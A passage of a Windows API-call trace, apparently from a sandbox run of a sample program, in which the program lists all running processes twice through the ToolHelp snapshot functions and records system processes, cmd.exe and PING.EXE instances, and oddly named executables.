dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.660] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.661] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) 
returned 1 [0096.662] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.662] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.663] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.663] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.664] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.665] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.665] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 
[0096.666] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.667] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.667] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.668] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.669] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.669] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.670] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 
[0096.671] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.672] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0096.673] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0096.674] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0096.675] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0096.677] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.678] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 
[0096.679] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0096.680] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0096.681] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0096.682] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0096.684] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0096.685] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0096.686] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, 
pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0096.687] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0096.688] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0096.689] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0096.690] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0096.691] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0096.693] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0096.694] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0096.695] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0096.696] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0096.697] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0096.723] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0096.724] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0096.725] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0096.726] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.727] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.728] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0096.729] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xad4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.730] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xadc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.731] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xae4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xac4, pcPriClassBase=8, dwFlags=0x0, szExeFile="CNuu8Vyt.exe")) returned 1 [0096.732] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0096.733] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xafc, th32DefaultHeapID=0x0, 
th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xa88, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.734] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.735] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.736] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.737] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb34, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.739] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb3c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xafc, pcPriClassBase=8, dwFlags=0x0, szExeFile="PING.EXE")) returned 1 [0096.741] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.742] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, 
cntThreads=0x1, th32ParentProcessID=0xad4, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.743] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yAQb5Zg8.exe")) returned 1 [0096.744] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xaec, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.745] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xb4c, pcPriClassBase=8, dwFlags=0x0, szExeFile="NhsgKr2p.exe")) returned 1 [0096.746] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb7c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0096.747] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0096.748] Process32NextW (in: hSnapshot=0xcc, lppe=0x12f948 | out: lppe=0x12f948*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xae4, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 0 [0096.748] CloseHandle (hObject=0xcc) returned 1 [0096.748] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc8 [0096.758] Process32FirstW (in: hSnapshot=0xc8, lppe=0x12f9ac 
| out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0096.759] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0096.760] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0096.784] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.785] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0096.785] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0096.786] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0096.787] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: 
lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0096.787] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0096.788] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0096.789] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.789] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.790] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.791] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.791] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: 
lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x35, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.792] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0096.793] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.793] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0096.794] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0096.795] Process32NextW (in: hSnapshot=0xc8, lppe=0x12f9ac | out: lppe=0x12f9ac*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, 